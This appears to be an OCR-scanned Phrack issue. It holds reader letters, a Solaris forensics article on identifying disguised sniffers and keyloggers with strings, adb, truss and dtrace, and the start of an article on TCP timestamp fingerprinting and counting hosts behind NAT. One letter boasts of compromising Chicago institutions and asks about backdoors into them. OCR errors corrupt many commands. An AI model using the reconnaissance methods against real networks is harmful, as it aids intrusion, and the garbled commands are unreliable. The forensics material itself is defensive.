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the articles of Phrack Magazine are intellectual property of their 
authors. 


These opinions do not necessarily represent those of the Phrack Staff. 


+ + + + F F 


2.txt Wed Apr 26 09:43:44 2017 1 


==Phrack Inc.== 
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| Loh DO PB ae 7 | 


| [ Phrack Staff ] | 


Wow people. We received so much feedback since we announced 
that this is our final issue. I’m thrilled. We are hated by so many 
(hi Mr. Government) and loved but so few. And yet it’s because of the few 
what kept us alive. 


"Phrack helped me survive the crazyness and boredom inherent in The Man’s 
system. Big thanks to all authors, editors and hangarounds of Phrack, 
past and present." -—-- Kurisuteru 


[espace 4 


"Guys, if it wasn’t for you, the internet wouldn’t be the same, our 
whole lifes wouldn’t be the same. I wish you all the best luck there 
is in your future. God bless you all and good bye!!!!! --- wolfinux 


[ I hope there is a god. There must be. Because I ran this magazine. I 
fought against unjustice, opression and against all those who wanted 
to shut us down. I fought against stupidity and ignorance. I shook 
hands with the devil. I have seen him, I have smelled him and I have 
touched him. I know the devil exists and therefore I know there is a 
God. ] 


"you're the first zine that i ever readed and you have a special place in 
my heart... you build my mind!! Thanks you all !!!!" --- thenucker/xy 


[ This brotherhood will continue...] 


|=[ 0x01 ] | 


I’m hoping the site isn’t being abandoned because of pressure from Homeland 
Security. 


[ I do not have a homeland. I do not believe in governments that scare 
the people. I do not bow for anyone. I do what I do best: I spread 
the spirit. ] 


[=[ 0x02” ] 


Could you please remove my personal info from this issue? 
http://www.phrack.org/phrack/52/P52-02 


Thanks in advance. 
Itai Dor-On [ <--- him. signing with real name. ] 


[ We are not doing phrack anymore. Sorry mate. Ask the new staff. ] 


[=[ 0x03 ] 


Are you interested in one "Cracking for Newbies" article? 
Or maybe about how to make a Biege Box? 


[ yO, psst. are you the guy that travels through time and tries to 
sell wisdom from the past? wicked! !!!}!}!!!! you are the man! ] 


[=[ 0x04 ] 


From: Joshua ruffolo <ruffolojoshua@yahoo.com> 
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A friend referred me to your site. 


[ smart guy! ] 

I know nothing much about what is posted. 
[ stupid guy! ] 

I don’t understand what’s what. 
[ this is loopback. ] 


Apparently there is some basic info that should be known to understand, but 
what is it? 


[ reading happens from the left to the right: 
from HERE > > > > ee. > > > > > > HERE ] 


|=[ 0x05 ] | 


During the spring quarter 2004 I took the Advanced Network Security class 
at Northwestern University. 


[ Must been challenging. Did they give you a Offical Master Operator 
Intense Security Expert X4-Certificate and tell you that you did 
really well? Bahahahahahahah. ] 


And I worked on a security project that has gained the interest of the 
CBS 2 Chicago investigative unit. 


HIT! I heard they 


[ Oh shit! the CBS is after you. Oh Shit. OH S 
FE} BETTER. I’M TELLING YOU! 


got certified 2 years before you! THEY ARE 
RUUUUUUUN! J 


By pure accident I compromised a large City of Chicago institution over the 
2003-2004 Christmas break. 


[ These accidents happen all the time. Ask my lawyer. ] 


During my research for this project I have compromised other large 
Chicagoland institutions. 


[ Rule 1: If you hack dont tell it to anyone. It’s risky. Especially 
in the country where you are living. ] 


For now, I would just like to know if anyone out there has penetrated th 
following networks and obtained any confidential data or left back doors to 
the following networks. Chicago Public Schools, City of Chicago, Chicago 
Police or Cook County. 


[ Rule 2: Dont ever tell anyone what you hacked. ] 


Christopher B. Jurczyk 
c-jurczyk@northwestern.edu 


[ Rule 3: DONT FUCKING POST YOUR EMAIL TO LOOPBACK! !!! ] 


[=[ 0x06 ] 


BTW I noticed phrack.org has no reverse DNS. Deliberate? 


[ anti hacker techniques. ] 


[=[ 0x07 ] 


From: tammy morgan <pipy2u@yahoo.com> 


Ok i know you hate dumb questons. 
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[ I love them. They make my day. ] 


Being new to this world cant read mag issues. Am subscriber got list 


from bot must have key. 


[ Am editor. Dont get you saying what. Hi. ] 


E" sorry sorry i am, 


But which one do i use to unlock and read. Soooo "LAM 
but could you take pity and just tell me how to open and read issues? 


stteo 


[=[ 0x08 ] 
From: Joshua Morales <moreasm@yahoo.com> 


This is really stupid question. can i subscribe to 
your publication. 


[ This is a really smart question: Who gave you our email address? ] 
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-—-[{ Introduction 

The art of security forensics requires lots of patience, creativity and 
observation. You may not always be successful in your endeavours but 
constantly /’sharpening’ your skills by hands-on practicing, learning a 
couple more things here and there in advance will definitely help. 


In this article I’d like to 
suspicious binary files and 
will use only standard, out 
the examples in the article 


share my personal experience in analyzing 
processes that you may find on the system. We 
of the box, UNIX utilities. The output for all 
is provided for Solaris OS. 


--[ Analyzing a ’strange’ binary file 

During your investigation you may encounter some executable (binary) files 
whose purpose in your system you don’t understand. When you try to read 
this file it displays ’garbage’. You cannot recognize this file by name 
and you are not sure if you saw it before. 


you cannot read the binary file with more, cat, pg, vi or 
You will need other 
strings, 


Unfortunately, 
other utilities that you normally use for text files. 
tools. In order to read such files, I use the following tools: 
file, ldd, adb, and others. 


Let’s assume, for example, that we found a file called crl in the /etc 


directory. The first command to run on this file is strings(1). This will 
show all printable strings in the object or binary file: 
S$ strings crl | more 
$3 SS SSS3S%3S —> SSSSSS (%.*S) 
Version: 2.3 
Usage: dsniff [-cdmn] [-i interface] [-s snaplen] [-f services] 
[-t trigger[,...]] [-rl-w savefile] [expression] 
/usr/local/lib/dsniff.magic 
/usr/local/lib/dsniff.services 


The output is very long, so some of it has been omitted. But you can see 
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that it shows that this is actually a dsniff tool masquerading as crl. 


Sometimes you may not be so lucky in finding the name of the program, 
version, and usage inside the file. If you still don’t know what this file 
can do, try to run strings with the ’a’ flag, or just ’-’. With these 
options, strings will look everywhere in the file for strings. If this flag 
is omitted, strings only looks in the initialized data space of the object 
file: 


S$ strings crl | more 


Try to compare this against the output from known binaries to get an idea 
of what the program might be. 


Alternatively, you can use the nm(1) command to print a name list of an 
object file: 


§ /usr/ccs/bin/nm -p crl | more 


crl: 

[Index] Value Size Type Bind Other Shndx Name 

[180] | 0 | O| FILE | LOCL 0 |ABS | decode_smtp.c 
[2198] |160348| 320| FUNC | GLOB 0 | 9 | decode_sniffer 


Note that the output of this command may contain thousands of lines, 
depending on the size of the object file. You can run nm through pipe to 
more or pg, or redirect the output to the file for further analysis. 


[To check the runtime linker symbol table - calls of shared library routines, 
use nm with the ’-Du’ options, where -D displays the symbol table used by 
ld.so.1l and is present even in stripped dynamic executables, and -u prints 
a long listing for each undefined symbol. 


You can also dump selected parts of any binary file with the dump(1) or 
elfdump(1) utilities. The following command will dump the strings table of 
crl binary: 


S /usr/ccs/bin/dump -c ./crl | more 


You may use the following options to dump various parts of the file: 


= Dump the string table(s). 

-C Dump decoded C++ symbol table names. 

-D Dump debugging information. 

=. Dump each file header. 

—-h Dump the section headers. 

-1l Dump line number information. 

-L Dump dynamic linking information and static shared library 
information, if available. 

ae) Dump each program execution header. 

-r Dump relocation information. 

-s Dump section contents in hexadecimal. 

-t Dump symbol table entries. 


Note: To display internal version information contained within an ELF file, 
use the pvs(1) utility. 


If you are still not sure what the file is, run the command file(l): 


S$ file crl 

eri: ELF 32-bit MSB executable SPARC32PLUS Version 1, V8+t+ 
Required, UltraSPARC1 Extensions Required, dynamically linked, not 
stripped 


Based on this output, we can tell that this is an executable file for SPARC 
that requires the availability of libraries loaded by the OS (dynamically 
linked). This file also is not stripped, which means that the symbol tables 
were not removed from the compiled binary. This will help us a lot when we 
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do further analysis. 


Note: To strip the symbols, do strip <my_file>. 


The file command could also tell us that the binary file is statically 
linked, with debug output or stripped. 


Statically linked means that all functions are included in the binary, but 
results in a larger executable. Debug output - includes debugging symbols, 
like variable names, functions, internal symbols, source line numbers, and 


source file information. If the file is stripped, its size is much smaller. 


[The file command identifies the type of a file using, among other tests, a 
test for whether the file begins with a certain magic number (see the 
/etc/magic file). A magic number is a numeric or string constant that 
indicates the file type. S magic(4) for an explanation of the format of 
/etc/magic. 


If you still don’t know what this file is used for, try to guess this by 
taking a look at which shared libraries are needed by the binary using 
1ldd(1) command: 


S ldd crl 
libsocket.so.1 => /usr/lib/libsocket.so.1 
librpcsvc.so.1l => /usr/lib/librpcsvc.so.1 


This output tells us that this application requires network share libraries 
(libsocket.so.1 and librpcsvc.so.1). 


The adb(1) debugger can also be very useful. For example, the following 
output shows step-by-step execution of the binary in question: 


adb crl 

Ss 

adb: target stopped at: 

ld.so.1*_rt_boot: ba,a +O0xc 
<ld.so.1‘*_rt_boot+0xc> 

FOS 

adb: target stopped at: 

ld.so.1*_rt_boot+0x58: st S11, [%00 + 8] 


You can also analyze the file, or run it and see how it actually works. But 
be careful when you run an application because you don’t know yet what to 
expect. For example: 


# adb crl 

ar 

Using device /dev/hme0 (promiscuous mode) 

192.168.2.119 -> web TCP D=22 S=1111 Ack=2013255208 


Seq=1407308568 Len=0 Win=17520 
web —-> 192.168.2.119 TCP D=1111 S=22 Push Ack=1407308568 


We can see that this program is a sniffer. See adb(1) for more information 
of how to use the debugger. 


If you decide to run a program anyway, you can use truss(1). The truss 
command allows you to run a program while outputting system calls and 
signals. 


Note: truss produces lots of output. Redirect the output to the file: 


§ truss -f -o cr.out ./erl 
listening on hmeO 

“EC 

$ 
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Now you can easily examine the output file cr.out. 


As you can see, many tools and techniques can be used to analyze a strange 
file. Not all files are easy to analyze. If a file is a statically linked 
stripped binary, it would be much more difficult to find what a file 
(program) is up to. If you cannot tell anything about a file using simple 
tools like strings and ldd, try to debug it and use truss. Experience using 
and analyzing the output of these tools, together with a good deal of 
patience, will reward you with success. 


--[{ Analyzing a ’strange’ process 


What do you do if you find a process that is running on your system, but 
you don’t know what it is doing? Yes, in UNIX everything is a file, evena 
process! There may be situations in which the application runs on the 
system but a file is deleted. In this situation the process will still run 
because a link to the process exists in the /proc/[PID]/object/a.out 
directory, but you may not find the process by its name running the find(1) 
command. 


For example, let’s assume that we are going to investigate the process 
ID 22889 from the suspicious srg application that we found running on our 
system: 


# ps -ef | more 
UID PID: -PPID: <€ STIME TTY TIME CMD 


root 22889 16318 0 10:09:25 pts/1 0:00 ./srg 

Sometimes it is as easy as running the strings(1) command against the 
/proc/ [PID] /object/a.out to identify the process. 

# strings /proc/22889/object/a.out | more 


TTY-Watcher version $s 


Usage: %s [-c] 
=¢ turns on curses interface 


NOTE: Running without root privileges will only allow you to monitor 
yourself. 


We can see that this command is a TTY-Watcher application that can see all 
keystrokes from any terminal on the system. 


Suppose we were not able to use strings to identify what this process is 
doing. We can examine the process using other tools. 


You may want to suspend the process until you will figure out what it is. 
For example, run kill -STOP 22889 as root. Check the results. We will look 
for 'T’ which indicates the process that was stopped: 


# /usr/ucb/ps | grep T 
root 22889 0.0 0.7 3784 1720 pts/1 T 10:09:25 0:00 ./srg 


Resume the process if necessary with kill -CONT <PID> 
To further analyze the process, we will create a \core dump\ of variables 
and stack of the process: 


gcore 22889 
gcore: core.22889 dumped 


Here, 22889 is the process ID (PID). Examine results of the core.22889 with 
strings: 


strings core.22889 | more 


[TY-Watcher version $s 
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Usage: %s [-c] 
-—¢ turns on curses interface 


NOTE: Running without root privileges will only allow you to monitor 
yourself. 


You may also use coreadm(1M) to analyze the core.22889 file. The coreadm 
tool provides an interface for managing the parameters that affect core 
file creation. The coreadm command modifies the /etc/coreadm.conf file. 
This file is read at boot time and sets the global parameters for core 
dump creation. 


First, let’s set our core filenames to be of the form core.<PROC NAME>.<PID>. 
We’11 do this only for all programs we execute in this shell (the $$ 
notation equates to the PID of our current shell): 


S$ coreadm -p core.%f.%p $$ 


The Sf indicates that the program name will be included, and the %p 
indicates that the PID will be appended to the core filenam 


You may also use adb to analyze the process. If you don’t have the object 
file, use the /proc/[PID]/object/a.out. You can use a core file for the 
process dumped by gcore or specify a ’-’ as a core file. If a dash (-) is 
specified for the core file, adb will use the system memory to execute the 
object file. You can actually run the object file under the adb control (it 
could also be dangerous because you don’t know for sure what this 
application is supposed to do!): 


# adb /proc/22889/object/a.out —- 


main:b 

patics 

breakpoint at: 

main: save ssp, —-Oxf8, %Ssp 

xs 

stopped at: 

maint+4: oul S10 

eS 

stopped at: 

main+s: sethi Shi (0x38400), %00 

Sm 

2? map 

b1l1l = ef632f28 ell = ef6370ac fll = 2£28 ‘/usr/lib/libsocket.so.1’ 
$q 

We start the session by setting a breakpoint at the beginning of main() and 


then begin execution of a.out by giving adb the ’:r’ command to run. 
Immediately, we stop at main(), where our breakpoint was set. Next, we list 
the first instruction from the object file. The ’:s’ command tells adb to 
step, executing only one assembly instruction at a time. 


Note: Consult the book Panic!, by Drake and Brown, for more information on 
how to use adb to analyze core dumps. 


To analyze the running process, use truss: 


truss -vall -f -o /tmp/outfile -p 22889 
more /tmp/outfile 


On other UNIX systems, where available, you may trace a process by using the 
ltrace or strace commands. To start the trace, type ltrace -p <PID>. 


To view the running process environment, you may use the following: 


/usr/ucb/ps auxeww 22889 
USER PID %SCPU %SMEM SZ RSS TT Ss START TIME COMMAND 


5 
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root 22889 0.0 0.4 1120 896 pts/1 S§ 14:15:27 0:00 - 
sh _=/usr/bin/csh 

MANPATH=/usr/share/man:/usr/local/man HZ= 
PATH=/usr/sbin:/usr/bin:/usr/local/bin:/usr/ccs/bin:/usr/local/sbin: 
/opt/NSCPcom/ LOGNAME=root SHELL=/bin/ksh HOME=/ 
LD_LIBRARY_PATH=/usr/openwin/lib:/usr/local/lib TERM=xterm TZ= 


The 


/usr/ucb directory contains SunOS/BSD compatibility package commands. The 
/usr/ucb/ps command displays information about processes. We used th 
following options (from the man for ps(1B)): 


Include information about processes owned by others. 


Display user-oriented output. This includes fields USER, %CPU,o 


SMEM, SZ, RSS and START as described below. 
Include processes with no controlling terminal. 


Display the environment as well as the arguments to the command. 
Use a wide output format (132 columns rather than 80); if repeated, 
that is, -ww, use arbitrarily wide output. This information is 


used to decide how much of long commands to print. 


To view the memory address type: 


ps -ealf | grep 22889 


FS UID PID PPID C PRI NI ADDR SZ WCHAN 
STIME TTY TIME CMD 
8S root 3401 22889 0 41 20 615a3b40 474 60ba32e6 14:16:49 


pts/l 0:00 ./srg 


To view the memory usage, type: 


ps -e -opid,vsz,rss,args 


PID VSZ RSS COMMAND 


22889 3792 1728 ./srg 


We can see that the ./srg uses 3,792 K of virtual memory, 1,728 of which 
have been allocated from physical memory. 


You 


can use the /etc/crash(1M) utility to examine the contents of a proc 
structure of the running process: 


# /etc/crash 


dumpfile = /dev/mem, namelist = /dev/ksyms, outfile = stdout 

> p 

PROC TABLE SIZE = 3946 

SLOT ST PID PPID PGID SID UID PRI NAME FLAGS 
66 s 22889 16318 16337 24130 0 58 srg load 

>p -f 66 

PROC TABLE SIZE = 3946 

SHOT-ST PID PPID PGID SID UID PRI NAME FLAGS 
66 s 22889 16318 16337 24130 0 58 srg load 


Ba 


After invoking the crash utility, 


tabl 


Session: sid: 24130, ctty: vnode(60b8f3ac) maj( 24) min( 1) 


PID 
tabl 


e slot number. 


Like the process structure, 


incl 
The 


luding an array that defines the disposition for each possible signal 


Signal disposition tells the operating system what to do in the event 


of a signal - ignore it, catch it and invoke a user-defined signal handl 
or take the default action. To dump a process’s uarea: 


we used the p function to get the process 
e slot (66, in this case). Then, to dump the proc structure for process 
22889, we again used the p utility, with the ’-f’ flag and the process 


the uarea contains supporting data for signals, 


er, 
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> u 66 
PER PROCESS USER AREA FOR PROCESS 66 
PROCESS MISC: 


command: srg, psargs: ./srg 
start: Mon Jun 3 08:56:40 2002 
mem: 6ad, type: exec su-user 


vnode of current directory: 612daf48 
> 
The ’u’ function takes a process table slot number as an argument. 
To dump the address space of a process, type: 


/usr/proc/bin/pmap -x 22889 


o obtain a list of process’s open files, use the /usr/proc/bin/pfiles 
command: 


/usr/proc/bin/pfiles 22889 


The command lists the process name and PID for the process’ open files. Note 
that various bits of information are provided on each open file, including 
the file type, file flags, mode bits, and size. 


If you cannot find a binary file and the process is on the memory only, you 
can still use methods described for analyzing suspicious binary files above 
against the process’s object file. For example: 


/usr/ccs/bin/nm a.out | more 
a.out: 
Index] Value Size Type Bind Other Shndx Name 
636] | 232688 | 4|OBJT |GLOB |0 | 17 |Master_utmp 
284] | 234864 | 20|OBJT |GLOB |0 |17 |Mouse_status 
You may also use mdb(1l) - a modular debugger to analyze the process: 


1 mdb -p 22889 


Loading modules: [ ld.so.1 libc.so.1 libnvpair.so.1 libuutil.so.1 ] 
> ::o0bjects 
BASE LIMIT SIZE NAME 
10000 62000 52000 ./srg 
££3b0000 ££3dc000 2c000 /lib/ld.so.1 
££370000 ££37c000 c000 /lib/libsocket.so.1 
££280000 ££312000 92000 /lib/libnsl.so.1 


--[ Security Forensics using DTrace 

Solaris 10 has introduced a new tool for Dynamic Tracing in the OS 
environment - dtrace. This is a very powerful tool that allows system 
administrators to observe and debug the OS behaviour or even to dynamically 
modify the kernel. Dtrace has its own C/C++ like programming language called 
'D language’ and comes with many different options that I am not going to 
discuss here. Consult dtrace(1M) man pages and 
http://docs.sun.com/app/docs/doc/817-6223 for more information. 


Although this tool has been designed primarily for developers and 
administrators, I will explain how one can use dtrace for analyzing 
suspicious files and process. 


We will work on a case study, as followes. For example, let’s assume that we 
are going to investigate the process ID 968 from the suspicious srg 
application that we found running on our system. 


By typing the following at the command-line, you will list all files that 
this particular process opens at the time of our monitoring. Let it run for 
a while and terminate with Control-C: 
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# dtrace -n syscall::open:entry’/pid == 968/ 
{ printf ("Ss%3s",execname,copyinstr(arg0)); }’ 


dtrace: description ’syscall::open*:entry’ matched 2 probes 
ae, 


CPU ID FUNCTION: NAME 
0 14 open:entry srg /var/ld/ld.config 
0 14 open:entry srg /lib/libdhcputil.so.1 
0 14 open:entry srg /lib/libsocket.so.1 
0 14 open:entry srg /lib/libnsl.so.1l 


D language comes with its own terminology, which I will try to address here 
briefly. 


The whole ’syscall::open:entry’ construction is called a ’probe’ and 

defines a location or activity to which dtrace binds a request to perform 

a set of ’actions’. The ’syscall’ element of the probe is called a ’provider’ 
and, in our case, permits to enable probes on ’entry’ (start) to any ’open’ 
Solaris system call (’open’ system call instracts the kernel to open a file 
for reading or writing). 


The so-called '’predicate’ /pid == 968/ uses the predefined dtrace 
variable ’pid’, which always evaluates to the process ID associated with 
the thread that fired the corresponding probe. 


The ’execname’ and /’copyinstr(arg0)’ are called ’actions’ and define the 
name of the current process executable file and convert the first integer 
argument of the system call (arg0) into a string format respectively. The 
printf’s action uses the same syntax as in C language and serves for the 
same purpose —- to format the output. 


Each D program consists of a series of ’clauses’, each clause describing one 
or more probes to enable, and an optional set of actions to perform when the 
probe fires. The actions are listed as a series of statements enclosed in 
curly braces { } following the probe name. Each statement ends with a 
semicolon (;). 


You may want to read the Introduction from Solaris Tracing Guide 
(http://docs.sun.com/app/docs/doc/817-6223) for more options and to 
understand the syntax. 


Note: As the name suggests, the dtrace (Dynamic Trace) utility will show you 
the information about a chnaging process - in dynamic. That is, if the 
process is idle (doesn’t do any system calls or opens new files), you won’t 
be able to get any information. To analyze the process, either restart it or 
use methods described in the previous two sections of this paper. 


Second, we will use the following command-line construction to list all 
system calls for ’srg’. Let it run for a while and terminate by Control-C: 


# dtrace -n ’syscall:::entry /execname == "Srg"/ { @num[probefunc] = 
count (); }’ 
dtrace: description ’syscall:::entry ’ matched 226 probes 
ie 

pollsys 

getrlimit 

connect 

setsockopt 


You may recognize some of the building elements of this small D program. In 
addition, this clause defines an array named ’num’ and assigns the 
appropriate member /’probefunc’ (executed system call’s function) the namber 
of times these particular functions have been called (count()). 


Using dtrace we can easily emulate all utilities we have used in the 
previous sections to analyze suspicious binary files and processes. But 
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dtrace is much more powerful tool and may provide one with more 
functionality: for example, you can dynamically monitor the stack of the 
process in question: 


# dtrace -n ’syscall:::entry/execname == "srg"/{ustack() }’ 
0 286 lwp_sigmask:entry 

libc.so.1*__systemcall6+0x20 

libc.so.1‘*pthread_sigmask+0x1b4 

libc.so.1‘sigprocmask+0x20 

srg ‘srg_alarm+0x134 

srg ‘scant+0x400 

srg ‘net_read+0xc4 

srg ‘maintOxabc 

srg ‘_start+0x108 


Based on all our investigation (see the list of opened files, syscalls, 
and the stack examination above), we may positively conclude that srg is a 
network based application. Does it write to the network? Let’s check it by 
constructing the following clause: 


# dtrace -n '/mib:ip::/execname == "srg"/{@[execname]=count () }’ 
dtrace: description /mib:ip::’ matched 412 probes 
dtrace: aggregation size lowered to 2m 
NE 
srg 520 


It does. We used /mib’ provider to find out if our application transmits 
to the network. 


Could it be just a sniffer or a netcat-liked application that is bounded 
to a specific port? Let’s run dtrace in the truss(1) like fashion to answer 
this question (inspired by Brendan Gregg’s dtruss utility ): 


!/usr/bin/sh 
dtrace=’ 
inline string cmd_name = "’S$1’'"; 
/* 
**x Save syscall entry info 
Kf; 
syscall:::entry 
/execname == cmd_name/ 


{ 
/* set start details */ 


self->start = timestamp; 
self->argO = arg0; 
self->argl = argl; 
self->arg2 = arg2; 

} 

/* Print data */ 
syscall::write:return, 
syscall::pwrite:return, 
syscall::*read*:return 


/self->start/ 


{ 
printf ("%s(0xSxX, \"SS\", Ox%X)\t\t = %d\n",probefunc, self->arg0, 
stringof (copyin(self-—>argl,self—>arg2)),self-—>arg2, (int) arg0O); 


self->argO = arg0; 
self->argl = argl; 
self->arg2 = arg2; 


} 


, 


# Run dtrace 
/usr/sbin/dtrace -x evaltime=exec -n "Sdtrace" >&2 
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Save it as truss.d, change the permissions to executable and run: 


# ./truss.d srg 


) 133 write:return write(0Oxl, " soll10 - 
> 192.168.2.119 TCP D=3138 S=22 Ack=713701289 Seq=3755926338 Len=0 
Win=49640\n8741 Len=52 Win=16792\n\0", 0Ox5B) = 91 

0 13 0 13 

write:return write(0xl, "192.168.2.111 -> 192.168.2.1 UDP D=1900 
S=21405 LEN=140\n\0", 0x39) = 57 

*C 


Looks like a sniffer to me, with probably some remote logging (remember the 
network transmission by ./srg discovered by the '’mib’ provider above!). 


You can actually write pretty sophisticated programs for dtrace using D 
language. 


Take a look at /usr/demo/dtrace for some examples. 


You may also use dtrace for other forensic activities. Below is an example 
of more complex script that allows monitoring of who fires the suspicious 
application and starts recording of all the files opened by the process: 


#!/usr/bin/sh 


command=$1 


, 


/usr/sbin/dtrace -n 
inline string COMMAND = "’Scommand’"; 
#pragma D option quiet 


/* 
xx Print header 
x} 
dtrace:::BEGIN 
{ 


/* print headers */ 
printf ("%-20s %5s %5s 5s %s\n","START_TIME", "UID", "PID", "PPID", "ARGS") ; 


} 


/* 
** Print exec event 
a7. 
syscall::exec:return, syscall::exece:return 
/ (COMMAND == execname) / 
{ 
/* print data */ 
printf ("%-20Y %5d %5d 5d %s\n",walltimestamp, uid, pid, ppid, 
stringof (curpsinfo->pr_psargs) ); 
s_pid = pid; 
} 
/* 
xx Print open files 
x7. 


syscall: :open*:entry 
/pid == s_pid/ 
{ 
printf ("Ss\n",copyinstr(arg0)); 


} 


, 


Save this script as wait.d, change the permissions to executable 
‘chmod +x wait.d’ and run: 


# ./wait.d srg 
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START_TIME UID PID PPID ARGS 
2005 May 16 19:51:20 100 1582 1458 ./srg 


/var/1d/ld.config 
/lib/libnsl.so.1 
/lib/libsocket.so.1 
/lib/libresolv.so.2 


AG. 
Once the srg is started you will see the output. 


However, the real power of dtrace comes from the fact that you can do 
things with it that won’t be possible without writing a comprehensive 

C program. For example, the shellsnoop application written by Brendan Gregg 
(http://users.tpg.com.au/adsln4yb/DTrace/shellsnoop) allows you to use 
dtrace at the capacity of ttywatcher! 


It is not possible to show all capabilities of dtrace in such a small 
presentation of this amazing utility. Dtrace is a very powerful as well a 
complex tool with virtually endless capabilities. Although Sun insists that 
you don’t have to have a ’deep understanding of the kernel for DTrace to be 
useful’, the knowledge of Solaris internals is a real asset. Taking a look 
at the include files in /usr/include/sys/ directory may help you to write 
complex D scripts and give you more of an understanding of how Solaris 10 
is implemented. 


-—-[ Conclusion 


Be creative and observant. Apply all your knowledge and experience for 
analyzing suspicious binary files and processes. Also, be patient and have 
a sense of humour! 
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--{ 1.0 - Introduction 


This article is about TCP timestamp option. This option is used to 
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offer a new way for counting host beyond a NAT and enhanced host 
fingerprinting. More deeply, this article tries to give a new vision of a 
class of bug known has "Design error". The bug described here, deserves 
interest for the following reasons. 


- It’s new. 

- It affects every platform since it is related to the specification 
rather than implementation. 

- It’s a good way to explain how some specifications can be broken. 


The article is organized has follow : First I will explain what’s 

wrong about TCP timestamp. Then I will describe How to exploit it, the 
limitations of this exploitation and a way to avoid it. In the second part 
I will talk about the origin of this error and why it will happen again. At 
the end I will give a proof of concept and greeting as usual. 


--[ 2.0 - Time has something to tell us 


----[ 2.1 - Past history 


Fingerprinting and Nat detection have been an active field for long 
time. Since you read phrack you already know the old school TCP/IP 
fingerprinting by Fyodor. 


You may also know pOf (Passive of fingerprinting) by M. Zalewski. With 
the version 2 he has done a wonderful tool, introducing clever ways to know 
if a host uses the NAT mechanism by analyzing TCP packet option. If you are 
interested in this tool (and you should !) read his paper 
"Dr. Jekyll had something to Hyde"[5]. 


In fact the technique described here is related to pOf in the way, that 
like pOf, it can be totally passive. 


To be complete about NAT detection, I need to mention that AT&T has 
done research on counting host behind a NAT[1]. Their work focus on IP ID, 
assuming that this value is incremental in some OS. In fact they are mainly 
talking about Windows box which increment IP ID by 256 for each packet. 
Discovered by Antirez[7], Nmap[6] has used this fact for a long time 
(option -sI). 


Now that we know what we are talking about it’s time to explain what’s 
going on. 


----[ 2.2 - Present 


NAT was designed to face the IP address depletion. It is also used to 
hide multiple hosts behind a single IP. The TCP timestamp option[2] is 
improperly handled by the IP Network Address Translator (NAT) mechanism[3]. 

In other words even scrubbing from pf doesn’t rewrite the timestamp option. 
Until now this property of the NAT has been useless (in the security point 
of view). It is interesting to point out that the timestamp option by itself 
has already been used for information disclosure. Let’s take a quick look 
at timestamp security history 


----[ 2.3 - Back to the beginning of timestamp history 


In the past the timestamp has been used to calculate the uptime of a 
computer[4]. Any one who had try the TCP fingerprint option (-O) of Nmap 
has been impressed by a line like this one 


"Uptime 36.027 days (since Tue May 25 11:12:31 2004)". 


Of course their is no black magic behind that, only two facts 
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—- Time goes back only in movie (sorry boys...) 
— Every OS increments the timestamp by one every n milliseconds. 


So if you know the OS, you know how often the OS increment the timestamp 
option. All you have to do to know the uptime is to apply a trivial math 
formula 


timestamp / num inc by sec = uptime in sec 


Has you can notice this formula does not take into account the warp 
around of integer. Here we know two information : the actual timestamp and 
the number of increments by second. This can only be done because we know 
the OS type. Let’s see how we can improve this technique to do it without 
knowing the OS. 


----[ 2.4 - Back to school 


Remember a long time ago at school, you heard about affine function. 
A basic example of it is 


"y = Ax + B" 


where A is the slope and B the initial point. 
The graphic representation of it is straight line. From timestamp point of 
view this can be express has the follow 


timestamp = numincbysec * sec + intial number 


When you do active fingerprinting you get the timestamp and know the 
numincbysec by guessing the OS. 


Now let’s suppose you can’t guess the OS. In this case you don’t know 
the slope and can’t guess the uptime. Here is an other way to know the 
slope of the OS. You need to get the computer timestamp twice. Name it tsl 
and ts2 and name the time (in sec) where you gather it tl and t2. 


With thoses informations, it is trivial to find the slope since we have th 
following equationnal system: 


tsl = A*sl + 


B 
ts2 = A*s2 + B 


which is solved by the following equation 
tsl - ts2 = A*(sl - s2) <=> A = (tsl - ts2) / (sl - s2) 
An imediate application of this idea can be implemented in active scanner: 


requeste twice the timestamp to verify that the slope is the 
same as the one guessed. 


This can be use to defeat some anti-fingerprint tools. It also can be used 
as a Standalone fingerprinting technic but will not be accurate has the TCP 
or ICMP one. 


Now that we have the theory ready, let’s go back to NAT. 


----[ 2.5 - Back to the NAT 


Let’s make the connection with the NAT. Since the timestamp option is 
not rewritten by NAT, we can count the number of host behind the NAT using 
the following algorithm 


1. for each host already discovered verifying is the packet belong to it 
straight line equation. each host has a unique straight line equation 
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until two host have booted at the same second. 


2. otherwise add the packet to unmatched packet : a new host beyond NAT is 
detected. 


Look to the proof of concept if you need to make things more clear. 
This simple algorithm has a lot of room for improvement. It has been keeped 
has simple has possible for clarity. As you can see timestamp option can be 
used to count host beyond a NAT in a reliable manner. It will also giveo 
indication of the OS class. 


-—---[ 2.6 —- Let’s do PAT 


PAT (Port Address Translation) is used to provide service on a box 
behind a NAT. 


The question is how do I know that the port is forwarded? 
Well timestamp is once again your friend. If for two different ports the 
slope of timestamp differs then there is a PAT and the OS of the two 
computers is different. If the timestamp gathered from the two ports does 
not belong to the same straight line, then it’s the same OS but not the 
same computer. 


Another interesting use of PAT is the round robin. Until now their were 
no way to know if such mechanism is used. By comparing the different 
timestamps gathered you can determine how many hosts are beyond a single 
port. This might be an interesting functionality to add to an active 
scanner. 


----[ 2.7 - Time to fight back 


Since playing with this option can give valuable information there is 
some limitation to this technique. Mainly Windows box does not use timestamp 
option when they establish connection[8] unless you activate it. This 
limitation only affects passive analysis, if you use timestamp when 
you connect to a windows it will use it too. Moreover many tweaks software 
activate the TCP extension in windows. 


To be completed on the subject I had to mention that it seems that TCP 
extension does not exist on win 9X. 


One other problem is the time gap. In passive mode there can be a 
desynchronization between computers due to computer desynchronization or 
network lags. In the proof of concept this phenomenon can occur. To handle 
it you need not to rely on the computer clock but on timestamp itself. 


What can we do against this ? Since no vendor except Microsoft (1) 
(Thanks Magnus) has answer to me, the following workaround may not be 
available. Here is a theoric way to patch this problem. 


1. Disabling tcp timestamp. This is the worse solution since we will need 
it with fast network[2]. 

2. Make NAT rewrite the timestamp and changing The NAT RFC. 

3. Changing the RFC to specify that the timestamp option needs to have a 
random increment. Modifying each implementation to reflect this change. 
The a clean way to fix this thing because it’s does not rely on an 
external system (the NAT computer in this case). 


Well I have to try to be as complete as possible for this technical 
part. The next part will be more "philosophic" since it deals with the 
cause instead of the consequenc 


--[ 3 - History has something to tell us 


In this part I will try to focus on why we have this situation and what 
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we can do about it. Here I am not talking about the timestamp option by 
itself but about the interaction between the timestamp option and the NAT 
mechanism. 


----[ 3.1 - Which class ? 


First question is what is this bug? This bug belongs to the design 
error class. To be more precise this bug exists because protocol 
specification overlap. IP was designed to be a one on one protocol: one 
client talks to one server. NAT violates this specification by allowing 
